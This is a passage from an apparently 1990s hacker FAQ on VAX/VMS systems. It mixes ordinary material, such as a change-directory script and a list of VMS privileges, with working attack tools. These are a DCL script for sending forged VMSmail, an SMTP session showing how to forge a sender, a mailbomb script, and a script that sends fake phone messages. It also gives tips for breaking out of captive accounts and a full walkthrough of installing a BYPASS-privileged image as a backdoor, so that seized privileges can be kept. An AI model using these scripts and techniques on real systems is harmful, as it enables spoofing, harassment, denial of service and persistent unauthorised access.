$  write sys$output " "
$  goto DIREND
$!
$  DIREND:
$  set message 'error_message'
$  on control_y then exit
$  on control_c then exit
$  if (ndir .eqs. "*") then goto DISPLAY
$  goto PARSE
$!
$!-Help-----------------------------------------------------------------------
$!
$  HELP:
$  type sys$input

	       CD.COM  Version 6  VMS Change Directory Command

			 Usage:  CD command/directory

CD         Display home directory,       CD ..       Change directory to the
	   current directory, node.      CD [-]      dir above current dir.

CD \       Change directory to your      CD ..sub    Change directory to a
CD HOME    SYS$LOGIN directory.          CD [-.sub]  "sideways" subdirectory.

CD dir     Change directory to the       CD *        Display/select the
CD [dir]   [dir] directory.                          available subdirectories.

CD .sub    Change directory to the       CD .        Reset current directory.
CD [.sub]  [.sub] subdirectory.          CD ?        Display CD instructions.

     CD :== @SYS$LOGIN:CD.COM                 DEFINE SYS$PROMPT "ON"
     To make CD available from                To have the VMS $ prompt
     any directory you change to.             display the current directory.

			      By The Mentor
$  goto END

	Once uploaded,  you should add the following line you your
	LOGIN.COM:

$ CD :== @DEVICE:[PATH]CD.COM  ! Replace DEVICE/PATH with user information

8.      "Okay,  where's my .profile"

	Easy.  There is none.  VMS startup routines (for personal accounts)
	can be found in the user's home directory under the name 
	"LOGIN.COM". Also check out the system-wide login routine at
	SYS$MANAGER:SYLOGIN.COM.

9.      "I can't seem to get to the DCL prompt"

	It is possible to setup "CAPTIVE" and "RESTRICTED" accounts under
	VMS. When setup correctly,  these can be difficult to break out of,
	however, in alot of cases, a simple control-C while the LOGIN.COM
	is executing.  Another method of keeping the LOGIN.COM 
	(or any commands for that fact) is to login with the 
	"/NOCOMMAND" flag.  This flag is placed after your username 
	at the USERNAME prompt,  and will bypass any account startup
	files/commands.    On a correctly setup captive account, 
	this will bomb out.    In the event that this fails,   some
	places slip up by allowing a parent to spawn off other
	processes.  For example,  if the captive account puts you
	into KERMIT, FTP,  or ALL-IN-ONE (Office automation/mail package), 
	it might be able to 'SPAWN' out to DCL or issue DCL commands. This
	can also  be prevented by simply setting up process limitation
	on the account.  

10.     Terminal Spoofing

	There are many DEC VT spoofing programs around to find. One can
	even be found on page 32 in the Winter 94-95 issue of 2600: Hook
	by Mr.Bungle.

11.     User Spoofing

	Programs such as "SETUSER" and "GLOGIN" are in the public domain
	for privileged users to operate as other users. 

12.     Accounting/Auditing Information

	Accounting information is kept in the file SYS$MANAGER:ACCOUNTNG.DAT
	($ACCOUNTING).
	A list of auditing options is available for the sys admin ($SET AUDIT).
	An intrusion database is part of the VMS security scheme
	($SHOW INTRUSION).
	"The Supervisor Series" (as reviewed in the Fall 94 issue of 2600)
	allows a privileged user to spy on and intervene in another user's
	on-line activities. It is public domain available at
	ftp.spc.edu /anonymous/macro32/savesets.
	There are also short programs out there for a privileged user to look
	at a user's command buffer.

		 -       VMSmail/SMTP Information     - 

1.     It is possible to send fake mail through VMSmail objects. DECNet
       object logs are produced and readable by sys admins.

$! To send anonymous or fake messages(except for remote node system admins -
$! mail server logs) through the MAIL mailbox to any user logged on the NET;
$! must only have NETMBX privilege
$null[0,8] = 0
$remote_node = P1
$if P1 .eqs. "" then read sys$command remote_node   /prompt="node: "
$local_user = P2
$if P2 .eqs. "" then read sys$command local_user    /prompt="local user: "
$local_user := 'local_user                      ! remove blanks and lowercases
$real_remote_user = P2
$if P2 .eqs. "" then -
  read sys$command real_remote_user /prompt="real remote user: "
$real_remote_user := 'real_remote_user          ! remove blanks and lowercases
$remote_user = P3
$if P3 .eqs. "" then read sys$command remote_user /prompt="remote user: "
$remote_user := 'remote_user           ! remove blanks and lowercases
$subject = P4
$if P4 .eqs. "" then read sys$command subject       /prompt="subject: "
$filename = P5
$if P5 .eqs. "" then read sys$command filename      /prompt="file name: "
$filename := 'filename
$!
$open/read/write slave 'remote_node'::"27="
$write slave "''local_user'"
$write slave "''real_remote_user'"
$read slave status
$write sys$output f$fao("Addressee status is: !XL",f$cvui(0,8,status))
$write slave null
$if filename .nes. ""
$ then
$  write slave "''remote_user'"
$  write slave "''subject'"
$  open/read/error=end_of_file file 'filename'
$loop:
$  read/end=end_of_file file record
$  write slave "''record'"
$  goto loop
$else
$ write slave "To whomever it concerns"
$ write slave "Demo of using VAXMail protocol"
$ write slave "This is message line"
$endif
$end_of_file:
$close/nolog file
$write slave null
$read slave status
$write sys$output f$fao("Delivery status is: !XL",f$cvui(0,8,status))
$close slave
$exit

	"I am attempting to send fake mail by connecting to the SMTP port,
but everytime I issue the 'mail from',  it gives me a 'Mailbox syntax
incorrect', or 'Bad arguments'.  I try the standard format a *always*
use,  but it *still* gives me this crap!  What's the problem?"......

	Of course,  it is possible to send fake mail by connecting to
the VMS machines SMTP (Simple Mail Transfer Protocol) port (25), 
however,  VMS "sendmail" routines tend to be a little more picky.  For 
example,  the session below would *appear* that it should work...

------<Start Session>-------

telnet 6.6.6.6 25
Type ^] (decimal 29) <CR> to return to NetBlazer
Trying 6.6.6.10:25...
Telnet session 0 connected to bogus.add.com
220 BOGUS.ADD.COM TGV MultiNet V3.3 Rev C SMTP service ready at Fri, 6 Jan 1995 
6:25:01 -0500 (EST)
helo
250 BOGUS.ADD.COM ; Hello , pleased to meet you.
mail from: [email protected]
553 Mailbox syntax incorrect
quit
221 BOGUS.ADD.COM TGV MultiNet V3.3 Rev C SMTP service complete at Fri, 6 Jan 19
95 6:25:22 -0500 (EST)
Telnet session 0 closed: EOF

-------<End Session>---------

	As you can see, however,  this is not the case.  Where is problem
lies is in the fact,  that alot of VMS sendmail routines require "<", and
">" around "mail from" and "rcpt to" commands,  and sometimes a address
(Especially the case with Multinet SMTP,  and Pathway's Wollangong 
Sendmail).   In order to get a good mailing address to "work",  try 
"mail from: <bob@bogus.add.com>".   Some VMS SMTP services do not require
the address,  but in most cases,  the ">" and "<" are required.  The
same applys with the "rcpt to" command.  You might need to format it 
the same as the "mail from".  I.E. - "rcpt to: <system>" or "rcpt to:
<system@bogus.add.com>".   

2.     "Can I use my favorite Unix sendmail holes on VMS sendmail?"

	Don't be silly.  No...  Digital did not believe that sendmail
	bugs and holes were important enough to port (grin).  (It 
	has been rumored that one sendmail hole *was* actually ported,  
	but as of this time,  this has not be verified. 

3.      "How can I code a mail bomb routine,  so that I can piss off
	 people really good and eat 'bandwidth'."

	Like this,  below...  

$! Simple VMS Mailbomb routine. 
$! Please be someone human.   Don't do this crap.
$!
$ say :== write sys$output
$ on error then goto err
$ if p4 .eqs. "" 
$ then 
$ say "Mailbomb V1.0                            Coded By The Beaver"
$ say "1995"
$ say ""
$ say "Usage:"
$ say "MAILBOMB [Msg Subject] [File to bomb with] [Username] [# of Times]"
$ exit
$ endif
$ A=1
$ loop:
$ mail/subject='p1' 'p2' 'p3' 
$ A = A + 1
$ if A .eqs. p4
$       then
$       say "Bomb Is Complete"
$       exit
$       endif
$ goto loop
$ err:
$ say "A Error has occured.  Be sure all file are present and correct"
$ exit

			 - VAXPhone Information -

1.      The phone protocol allows you to send messages.
	Example follows:

$! To send anonymous or fake messages(except for remote node system admins -
$! phone server logs) through the PHONE mailbox to any user logged on the NET,
$! similar to phone ringing messages broadcast to users' terminals; must only
$! have NETMBX privilege
$! Note:
$! This has the unfortunate side effect of kicking the user off his phone if 
$! its not a patched version.
$!
$ debug = "F"
$ null_byte[0,8] = 0
$ true_byte[0,8] = 1
$ false_byte[0,8] = 0
$ id_rmt_user[0,8] = 7          !text = id of remote user, status rtn
$ ring_rmt_user[0,8] = 8        !text = 1 byte, true if first ring, sts rtn
$ hang_up[0,8] = 9              !link broken, no status
$ master_busy[0,8] = 10         !when requested to do other functions
$ master_answer[0,8] = 11       !from another master
$ master_reject[0,8] = 12       !from another master
$ slave_exit[0,8] = 13          !command to slave
$ text[0,8] = 14                !text >= 1 char frag
$ request_dir[0,8] = 15         !null returned when done
$ force_third_party[0,8] = 17   !text is id of 3rd party
$ on_hold[0,8] = 18             !put target on hold
$ off_hold[0,8] = 19            !take target off hold
$!
$ status_unknown = 0    !Unknown problem
$ status_success = 1    !The operation was completed successfully.
$ status_isyntax = 2    !Invalid user syntax
$ status_nocomm = 3     !Slave could not communicate with user
$ status_missunam = 4   !<node::user> missing user name
$ status_nopriv = 5     !The slave does not have necessary privileges.
$ status_noexist = 6    !The specified Target user does not exist.
$ status_badterm = 7    !The Target's terminal cannot be used by PHONE.
$ status_logoff = 8     !The Target logged off during the procedure.
$ status_offhook = 9    !Target phone off hook (e.g., /NOBROADCAST set).
$!
$ remote_node = P1
$ if P1 .eqs. "" then read sys$command remote_node   /prompt="node : "
$ remote_user = p2
$ if P2 .eqs. "" then read sys$command remote_user   /prompt="user : "
$ remote_user := 'remote_user                   ! remove blanks and lowercases
$ local_user_in = "''P3'"
$ if P3 .eqs. "" then read sys$command local_user_in /prompt="text : "
$ local_user = "msg:: " + local_user_in + -
   "                                                                      " -
   + null_byte
$ open/read/write link 'remote_node'::"29="
$ write link id_rmt_user,local_user,remote_user
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$       if debug then write sys$output "Link to phone setup"
$ if local_user_in .eqs. "" then goto exit
$ write link ring_rmt_user,local_user,true_byte
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$       if debug then write sys$output "1 ringy-dingy"
$       count = 1
$ on control_y then goto exit
$  goto exit
$LOOP:
$ write link ring_rmt_user,local_user,false_byte
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$       if count .ge. 3 then goto exit
$       count = count +1
$       if debug then write sys$output count," ringy-dingies"
$ goto loop
$EXIT:
$ write link slave_exit,local_user
$ close link
$       if debug then write sys$output "Link cleared"
$ exit
$ERROR:
$! under development
$ write sys$output "An error has occured."
$ close link
$ exit

2.      The phone protocol allows you to get a list of interactive users on
	a system.
	From DEC's own archives, example follows:

$ vfy = f$verify(f$integer(f$logical("debug")) .or. f$integer('debug'+0))
$ if f$cvui(1,1,'debug'+0) .or. f$cvui(1,1,f$logical("debug")+0) -
    then write sys$error "File: PHONEDIR.COM, 29-Feb-1984"
$!++
$!  PHONEDIR.COM, E2.0 28-Oct-1985
$!
$!  COPYRIGHT (c) 1984 By
$!  DIGITAL EQUIPMENT CORPORATION, Maynard, Massachusetts 01754.
$!  All Rights Reserved.
$!
$!  This software is furnished without license and may be used and  copied
$!  only with the inclusion of the above copyright notice. No title to and
$!  ownership of the software is hereby transferred.
$!
$!  The information in this software is subject to change  without  notice
$!  and  should  not  be  construed as  a commitment by Digital  Equipment
$!  Corporation.
$!
$!  Digital  assumes  no responsibility for the use or reliability of this
$!  software.
$!--
$!++
$!  Author: SWM,  29-Feb-84,  PARROT::SWM
$!
$!  Edited:
$!    23-Nov-84 SWM, User lookup, V3 compatablility, Psthru capability.
$!    24-Nov-84 DC, Added logical name translation.
$!    30-Nov-84 DC, '_' overrides logical, infn loop check.
$!    27-Oct-85 SWM, Protocol fix, pipelining, clean up code.
$!
$!  Abstract:
$!    Take a directory of users across network via phone protocol.
$!
$!  Inputs: P1 = Node:: (or Node::Node::...) to get user list from;
$!    or Node::User to check on.  Remote user can be specified as
$!    separate parameter P2.  Double colon optional if single node.
$!
$!--
$INITIALIZE:
$ on control_y then goto close
$ set noon
$ v4 = "true"
$ if f$extr(0,2,f$getsyi("version")) .eqs. "V3" then v4 = "false"
$!$ error_status = %x1001C002
$ null[0,8] = 0
$!$ if v4 then old_msg = f$envi("message")
$!$ set message /nofacility/noseverity/noidentification/notext
$!
$ask_node_name:
$ if p1 .eqs. "" then read/end=exit/error=exit sys$command p1 /prompt="Node? "
$ if p1 .eqs. "" then goto exit
$!
$! allow override of node::user logical names
$ sanity_check = 0
$log_name_loop:
$ underscore_found = f$locate("_",p1) .eq. 0
$ if underscore_found then goto got_node_name
$ if f$logi(p1) .eqs. "" then goto got_node_name
$ p1 = f$logi(p1)
$ sanity_check = sanity_check + 1
$ if sanity_check .le. 64 then goto log_name_loop
$ goto error
$!
$got_node_name:
$! add username to node string if specified as separate parameter
$ if p2 .nes. "" then -
   if f$extr(f$leng(p1)-2,2,p1) .eqs. "::" then p1 = f$extr(0,f$leng(p1)-2,p1)
$ if p2 .nes. "" then p1 = p1 + "::" + p2
$! check if single node specified without dbbl colon.
$ if p2 .eqs. "" then -
    if f$parse(p1,,,"node") .eqs. "" then p1 = p1 + "::"
$!-    if f$extr(f$leng(p1)-2,2,p1) .nes. "::" then p1 = p1 + "::"
$!
$ if v4 then p1 = f$edit(p1,"trim,upcase,uncomment")
$ if .not. v4 then p1 := 'p1'
$ remote_user_name = f$parse(p1,,,"name")
$ node = f$extr(0,f$leng(p1)-f$leng(remote_user_name),p1)
$ if node .eqs. "" then node = f$logi("sys$node")
$! commented out doesn't work if access ctrl (f$parse hides password).
$!$ remote_user = node - f$parse(f$extr(0,f$leng(node)-2,node),,,"node") -
$!-    + remote_user_name       ! remove any psthru node names...
$!
$ sanity_check = 0
$ temp = node
$ node_string = ""
$! loop to find name of destination node for use in phone protocol...
$dest_node_loop:
$ loc = f$loca("::",temp)
$ node_string = node_string + f$parse(f$extr(0,loc+2,temp),,,"node")
$! commented out for alternate node_string display if using access ctrl.
$!$ node_string = node_string + f$extr(0,loc,temp)
$!$ node_string = f$extr(0,f$loca("""",node_string),node_string) + "::"
$ remote_user = f$extr(0,loc,temp)                      ! last node
$ remote_user = f$extr(0,f$loca("""",remote_user),remote_user) ! minus a/c.
$ temp = f$extr(loc+2,999,temp)
$ sanity_check = sanity_check + 1
$ if f$loca("::",temp) .ne. f$leng(temp) .and. sanity_check .lt. 32 -
    then goto dest_node_loop
$ remote_user = remote_user + "::" + remote_user_name
$!
$ if v4 then local_user = f$logi("sys$node") + -
    f$edit(f$getjpi("","pid"),"trim,upcase")
$ if .not. v4 then local_user := 'f$logi("sys$node")''f$getjpi("","pid")'
$ local_user = local_user - "_" + null                  ! asciz string
$!
$CREATE_LINK:
$! noon is set so display error message
$ open/read/write slave 'node'"29="
$ save_status = $status
$!$ if save_status .eq. error_status then goto unreachable
$ if .not. save_status then goto exit
$!
$ if remote_user_name .eqs. "" then goto dir_function
$LOCATE_FUNCTION:
$ message[0,8] = 7                                      ! ID remote user
$ message = message + local_user + remote_user
$ write/error=error slave message
$ read/end=error/error=error slave record
$ if f$cvui(0,8,record) .eq. 1 then -
    write sys$output "''remote_user' is currently available."
$! Note: These response values, while defined in the phone protocol do
$!   not seem to be supported in response to the ID function for VAXPhone.
$ if f$cvui(0,8,record) .eq. 6 then -
    write sys$output "''remote_user' is not available."
$ if f$cvui(0,8,record) .eq. 7 then -
    write sys$output "''remote_user''s phone is not usable by phone."
$ if f$cvui(0,8,record) .eq. 9 then -
    write sys$output "''remote_user''s phone is off hook (/NOBROADCAST)."
$ if (f$cvui(0,8,record) .ne. 1) .and. (f$cvui(0,8,record) .ne. 6) .and. -
    (f$cvui(0,8,record) .ne. 7) .and. (f$cvui(0,8,record) .ne. 9) then -
   write sys$output "''f$fao("Bad status received = !2ZB.",f$cvui(0,8,record))
$ exit_command[0,8] = 13
$ write/error=error slave exit_command,local_user
$ goto close
$!
$DIR_FUNCTION:
$ message[0,8] = 15                                     ! Request directory
$ message = message + local_user
$ write/error=error slave message
$ write/error=error slave message                       ! Pipeline requests!!!
$ write/error=error slave message
$ write/error=error slave message
$! Pipelining limited to 2 extra requests max to keep procedure from hanging.
$!   Worst case limit is (DECnet_Pipeline_Quota/DECnet_Buffer_Size) * 2 + 1
$print_header:
$ count = 0
$ write sys$output ""
$ write sys$output "	Directory of Users on Node ",node_string
$ write sys$output ""
$! skip pipeline hack code as RMS timeouts don't with DECnet yet.
$ GOTO LOOP
$!$ if .not. v4 then write/error=error slave message
$ if .not. v4 then goto loop
$! Put up to 8 requests in logical link pipe...
$ sanity_check = 3                                      ! number msgs in pipe.
$pipeline_hack:
$ sanity_check = sanity_check + 1
$ if sanity_check .ge. 8 then goto loop
$ write/error=error slave message
$ read/end=eof/error=pipeline_hack/timeout=0 slave record
$ goto loop_alt_entry
$!
$loop:
$ read/end=eof/error=error slave record
$loop_alt_entry:
$ if record .eqs. "" then goto done
$ write/error=error slave message
$ write sys$output record
$ count = count + 1
$ goto loop
$eof:
$! rsx-11 phone slave closes link after directory function.
$ rsx = "  (System is RSX)"
$done:
$ write sys$output ""
$ write sys$output "Total number of users = ''f$string(count)'''rsx'"
$! don't tell slave to exit if link already closed.
$ if "''rsx'" .nes. "" then goto close
$ exit_command[0,8] = 13
$ exit_command = exit_command + local_user
$ write slave exit_command
$eof_loop:
$ GOTO CLOSE                                            ! Hack!!!
$! Note: Should finish up properly by reading all responses.
$ read/end=close/error=error slave dummy
$!$ write sys$output dummy                              ! show empty data
$ goto eof_loop
$!
$unreachable:                                           ! this removed...
$! this section left in for possible enhanced error checking...
$!$ write sys$output ""
$!$ write sys$output "Node unreachable, unknown, or object unknown."
$ goto exit
$ERROR:
$ write sys$error "PHONEDIR-E-BugCheck, An error has occured."
$close:
$! close the link no matter what.
$ close /error=exit slave
$exit:
$!$ set message 'old_msg'
$ if vfy then set verify                                ! 'f$verify(0)'
$ exit

	BTW: There is a modified phone program available via
	     anonymous ftp which gives increased functionality
	     with commands such as 'reject' and 'transcribe'

	      -      User/Image Privilege Information     -

1.      "How are user privileges setup?"

	User privileges are handled in a completely different manner
	than Unix handles them.  With Unix,  you have either 

	a> all priveleges (IE - "root") 
	b> standard user 

	VMS is a touch different.

	For example,  let's say you have a field engineer that needs
	a standard user account (I.E. - be able to send/receive mail, 
	do standard DCL commands.. Normal TMPMBX, NETMBX,  and
	all that),  but in order to do his job,  he needs to run the
	online VMS diagnostics software (which is a privileged operation)
	When you add the user,  you can grant him "DIAGNOSE" privledges,
	and normal user privileges,  and he will be able do regular users
	commands and run diagnostics. 

	What this means is that you can grant certain privileged 
	function to certain users,  rather than giving the user 
	"the whole system".  

	This user we added would only have access to privileges that deal
	with the diagnostic software.  For example,  he could not add
	users (via "AUTHORIZE" or modify the SYSUAF.DAT).  

"Privileges restrict the user of certain system functions to processes
created on the behalf of authorized users.  These restrictions protect 
the integrity of the operating system code,  data,  and resources and
thus,  the integrity of user services." 

"Users cannot execute an image that requires a privilege they do not 
possess,  unless the image is installed as a known image with the 
privilege in question or the image runs within a protected subsystem"

	Privileges can also be installed on images,  so that when that 
	image is executed,  that images process get the permissions 
	that it has been granted (this does not mean that the user gets
	the privileges,  but rather,  just the process running this
	task)

			- OpenVMS VAX Guide To System Security
			  (6.0 manual). 

	Below is a listing of privileges,  and a brief description.

ACNT      -     Lets a process use the RUN (Process) command to create
		Process ($CREPRC) system service to create processes
		in which accounting is disabled.  A process in which
		account is disabled is on whose resources are not logged. 

ALLSPOOL  -     This privlege lets user's process allocate a spooled
		device by executing the Allocate Device ($ALLOC) system
		service or by users the DCL command "ALLOCATE"

ALTPRI    -     Allows the user's process to 
		1.  Increase its own priority
		2.  Set the base priority of a target process
		3.  Change priority of its batch or print jobs. 

AUDIT     -     Allows software to append to audit records to the system
		security audit log file.   As a result,  this privilege
		permits the logging of events that appear to come from the
		operating system

BUGCHK    -     Allows the process to make bugcheck error log entries
		from users,  supervisor, or compatibility mode or to send
		messages to the system error logger. 

BYPASS    -     Allows the user's process full access to all protected
		objects,  totally bypassing UIC-based protection, 
		ACL protection (Access Control List) and mandatory 
		access controls.   Users with this privilege can 
		modify authorization records (SYSUAF.DAT,  where
		usernames/passwords are stored),  rights identifiers
		(RIGHTSLIST.DAT), DECNet object passwords and accounts
		(NETOBJECT.DAT),  and unlimited file access.

CMEXEC    -     Allows the user's process to execute the Change Mode to
		Executive system service.

CMKRNL    -     Allows the user's process to execute the Change Mode to
		Kernel system services.   These privileges allow 
		things like modify a multiprocessor operation (START/
		CPU,  STOP/CPU type commands),  modifying the system
		rights list (SET RIGHTS/ATTRIBUTE), change a processes
		UIC (SET UIC),  and other functions.

DETACH    -     Processes can create detached processes that have there
		own UIC without the DETACH privilege,  provided the 
		processes wants to specify a different UIC for the 

DIAGNOSE  -     Lets a process run online diagnostic programs and intercept
		and copy all messages written to the error log file. 

DOWNGRADE -     Permits a process to manipulate mandatory access controls.

EXQUOTA   -     Allows the space taken by the user's files on a given
		disk volumes to exceed any usage quotas set for the user 
		(as determined by UIC) on those volumes. 

GROUP     -     Allows the user's process to affect other processes in its
		own group.

GRPNAME   -     Lets the user's process bypass  access controls
		and insert names into (and delete from) the logical table
		of the group to which the process belongs by the use of the
		Create Logical Bane and Delete Logical Name system services.

GRPPRV    -     When the process's group matches the group of the object
		owner,  the GRPPRV privilege gives a process the access rights
		provided by the object's system protection field.  GRPPRV
		also lets a process change the protection or the 
		ownership of any object whose owner group matches the
		process's group by using the DCL commands SET SECURITY

IMPORT    -     Lets a process manipulate mandatory access controls.  The
		privilege lets a process mount unlabeled tape volumes.  
		This privilege is reserved for enhanced security products
		like SEVMS. 

LOG_IO    -     Lets the user's process execute the Queue I/O request
		($QIO) system service to perform logical-level I/O
		operations.

MOUNT     -     Lets the user's process execute the mount volume QIO
		function. 

NETMBX    -     lets a process perform functions related to a DECNet
		Computer Network. 

OPER      -     Allows a process to use the Operator Communications 
		Manager (OPCOM) process to reply to user's request, 
		to broadcast messages to all terminals logged in,  to 
		designate terminals as operator terminals and specify
		the types of messages to be displayed to these operator's
		terminals,  and to initialize and control the log file
		of operator's messages. 

PFNMAP    -     Lets a user's process create and map page frame number
		(PFN) global sections to specific pages of physical 
		memory or I/O device registers,  no matter who is using
		the pages or registers. 

PHY_IO    -     Lets the user's process execute the Queue I/O request
		($QUI) system service to perform physical-level I/O
		operations. 

PRMCEB    -     Lets the user's process create or delete a permanent
		common even flag cluster by executing the Associate 
		Common Event Flag Cluster. 

PRMGBL    -     Lets the user's process create or delete permanent 
		global section by executing the Create and Map Section
		or Delete Global Section system service.  In addition
		,  a process with this privilege (plus CMKRNL and SYSGLB
		privileges) can use the Install utility (INSTALL)

PRMMBX    -     Lets user's process create or delete permanent mailbox
		by the Create Mailbox and Assign Channel system service
		or the DElete Mailbox system service.   Mailboxes are
		buffers in virtual memory that are treated as if they were
		record oriented I/O devices.  A mailbox is used for
		general interprocess communications. 

PSWAPM    -     Lets the user's process control whether is can be 
		swapped out of the balance set by executing the 
		Set Process Swap Mode system service. 

READALL   -     Lets the process bypass existing restrictions that would
		otherwise prevent the process from reading an object. 
		Unlike the BYPASS privilege which will permits writing and
		deleting,  READALL permits only the reading of objects
		and allow updating of such backup-related file
		characteristics as the backup date. 

SECURITY  -     Lets a process perform security related functions such
		as modifying the system password with the DCL command
		SET PASSWORD /SYSTEM or modifying the system alarm 
		and auditing settings using the DCL command 
		SET AUDIT.  

SETPRV    -     Lets user's create process whose privileges are greater
		than its own.   With this privilege,  a user can obtain
		any other privilege via the DCL command "SET PROCESS/
		PRIV"

SHARE     -     Lets process assign channels to devices allocated to other
		processes or to a nonshared device the Assign I/O Channel
		system service. 

SHMEM     -     Lets the user's process create global sections and 
		mailboxes (permanent or temporary_ in memory shared by
		multiple processors if the process also has appropriate
		PRMGBL,  PRMMBX,  SYSGBL,  and TMPMBX privileges. 

SYSGBL    -     Lets user;s create or delete system global sections by
		executing the Create and Map Sections or the Delete
		Global Section system services.  With this privilege
		and CMKRNL and PRMGBL,  the Install command (INSTALL)
		can be used. 

SYSNAM    -     Let's user's process bypass discrepancy access
		controls and insert names into the system logical
		name table and delete names from that table.  A
		process with this privilege can use the DCL commands
		ASSIGN and DEFINE to add names to the system logical
		in the user or executive mode and can use the DEASSIGN
		command in either mode to delete names from the 
		table. 

SYSPRV    -     Lets a process access security objects by the system
		protection field and also read and modify the owner
		(UIC),  the UIC-based protection code,  and the ACL 
		of and object.   Any processes with this privilege
		can add,  modify,  or delete entries in the system
		user authorization file (SYSUAF.DAT)

TMPMBX    -     Lets user's create process create a temporary mailbox
		by executing the Create Mailbox and Assign Channel. 

UPGRADE   -     Lets a process manipulate access controls.  This privilege
		is reserved for enhanced security products like SEVMS.

VOLPRO    -     Lets user's processes:
			o Initialize a previously used volume with an owner
			  UIC different from the user's own UIC.
			o Override the expiration date on a tape or
			  disk owned by another user. 
			o Use the ////FOREIGN qualifier to mount a Files-11
			  volume owned by another user.
			o Override the owner UIC protection of volume. 

WORLD     -     Lets user's process affect (suspend, resume, delete, 
		set priority, wake,  etc) other processes both inside
		and outside its group.

				- Taken Mostly From the, "OpenVMS VAX
				  System Security" (V6.0) 

2.      "How can I make a SUID Shell in VMS".... 

	Simple...  You can't.   Privileges are handled in a much different
	method than on Unix (see "How are user privileges setup").  You
	can make a program (image) that when executed,  the process
	of that image gains the privileges that it was "installed"
	with.    For example,  if you write a program that needs read access
	to the SYSUAF.DAT you *could* make SYSUAF.DAT world readable 
	(if you are on a privileged account,  of course)  but this 
	would be very,  very unwise.    Another method would be to 
	"INSTALL" the executable image and give it READALL privileges, 
	so that when a user's processes calls your programs,  that programs
	process (the image running) gets READALL privileges.   Then that
	process would be able to read the SYSUAF.DAT,   but the user's
	process would not.  

	With this in mind,   it is possible to create a senerio similar
	to that of a "SUID Shell" (but without the shell).  The idea
	is to give the privileges (that you want to keep ahold of) 
	on a program that does nothing more than make a call to 
	LIB$SPAWN.   The idea is to write a program that will do nothing
	more than create another process (that drops you to DCL)
	via LIB$SPAWN,  and using the VMS "INSTALL" utility,  give it
	the privileges that you wish that process to have.  There are
	several downfalls to this.  To accomplish this,  you would
	need CMKRNL privileges yourself (your process).  So your process
	would already need certain privileges to pull this off. The idea 
	here is in the event that the user has obtained a "privileged
	account",  and wishes to remain privileged,  he/she could 
	install a image which could be called by a normal (non-privileged)
	user in which he/she could obtain the system privileges again. 

	Below is a sample session capture of me installing a privileged
	image.   The privilege I gave this image is "BYPASS" (Bypass
	all security features,  and the ability to modify SYSUAF.DAT
	and RIGHTSLIST.DAT)

Trying...
Connected to UpperDck
Escape character is '^]'.

		       Upper-Dck VMS Development System 

Username: SYSTEM   ! Login to our privileged account
Password: 
	Welcome to VAX/VMS version V5.2 on node UPPERDCK
    Last interactive login on Friday,  6-JAN-1995 07:17
    Last non-interactive login on Thursday, 22-DEC-1994 15:51

 User= SYSTEM       Directory= [SYSMGR]       UIC=  [1,4]
	Terminal= NTY5:       6-JAN-1995 07:19:01.00

sysm>basic      ! I am going to use VMS BASIC,  but use anything you want

VAX BASIC V2.3

Ready

10 external long function lib$spawn ! Call "SPAWN" library.  The idea with this
   declare long xspawn              ! program is to give us another "spawned"
   xspawn=lib$spawn()               ! process. 

save mytrap             ! Save this program
Ready

exit                    ! and exit the VMS BASIC. 
sysm>basic mytrap*.*    ! Just to show our file. 

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1        

Total of 1 file.
sysm>basic mytrap       ! This will compile and make our object code
sysm>dir mytrap*.*      ! To show our object code. 

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1        MYTRAP.OBJ;1        

Total of 2 files.

sysm>link mytrap/notraceback  ! Link it, with notraceback (for priv reasons)
sysm>dir mytrap*.*            ! To show our executeable code. 

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1        MYTRAP.EXE;1        MYTRAP.OBJ;1        

Total of 3 files.

sysm>copy mytrap.exe sys$system:  ! copy it to sys$system: [this is silly] 
sysm>install                      ! Run install to setup priv's on our imagine.
INSTALL> create mytrap/priv=(bypass) ! Give "mytrap" bypass priv's
INSTALL> list mytrap/full            ! Just to show off the image priv's

DISK$VAXVMSRL5:<SYS6.SYSEXE>.EXE
   MYTRAP;2                       Prv 
	Entry access count         = 0
	Privileges = BYPASS 

INSTALL> exit                    ! Get the hell out of here.
sysm>dir sys$system:mytrap.exe   ! And just to show its still there

Directory SYS$SYSROOT:[SYSEXE]

MYTRAP.EXE;2        MYTRAP.EXE;1        

Total of 2 files.

sysm>dir sys$system:mytrap.exe;2 /full ! Notice "world" protections...

Directory SYS$SYSROOT:[SYSEXE]

MYTRAP.EXE;2                  File ID:  (43314,33,0)       
Size:            4/6          Owner:    [1,4]
Created:   6-JAN-1995 07:20:26.35
Revised:   6-JAN-1995 07:20:41.54 (2)
Expires:   <None specified>
Backup:    <No backup recorded>
File organization:  Sequential
File attributes:    Allocation: 6, Extend: 0, Global buffer count: 0
		    No version limit, Contiguous best try
Record format:      Fixed length 512 byte records
Record attributes:  None
RMS attributes:     None
Journaling enabled: None
File protection:    System:RWED, Owner:RWED, Group:RE, World:
Access Cntrl List:  None

sysm>set file sys$system:mytrap.exe /protection=(w:re) ! because world cant
sysm>log                                               ! read/execute. Logout. 

  SYSTEM       logged out at  6-JAN-1995 07:42:02.55
Connection closed by foreign host.

	[Now,  we make a new connection to the system to test our ]
	[ "MYTRAP.EXE" with the image priv's attached to it       ]

Trying...
Connected to UpperDck.
Escape character is '^]'.

		       Upper-Dck VMS Development System 

Username: JOEBOB        ! Now, log as a normal user. 
Password: 
	Welcome to VAX/VMS version V5.2 on node UPPERDCK
    Last interactive login on Friday,  6-JAN-1995 07:14

 User= JOEBOB        Directory= [UPPERDCK]       UIC=  [130,163]
	Terminal= NTY6:       6-JAN-1995 07:42:12.00

UPDCK> show process/priv ! To prove that we have normal user priv's

 6-JAN-1995 07:42:27.01   User: JOEBOB           Process ID:   0000010F
			  Node: UPPERDCK         Process name: "JOEBOB"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device

Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> set proc/priv=bypass ! To prove I can't enabled "BYPASS" priv's
%SYSTEM-W-NOTALLPRIV, not all requested privileges authorized
UPDCK> mcr mytrap           ! Run our little "privledge provider"
UPDCK> show process/priv    ! To show our priv's after we exec. MYTRAP.EXE
			    ! note that we are spawned (see PID and Proc. Name)

 6-JAN-1995 07:42:46.05   User: JOEBOB           Process ID:   00000110
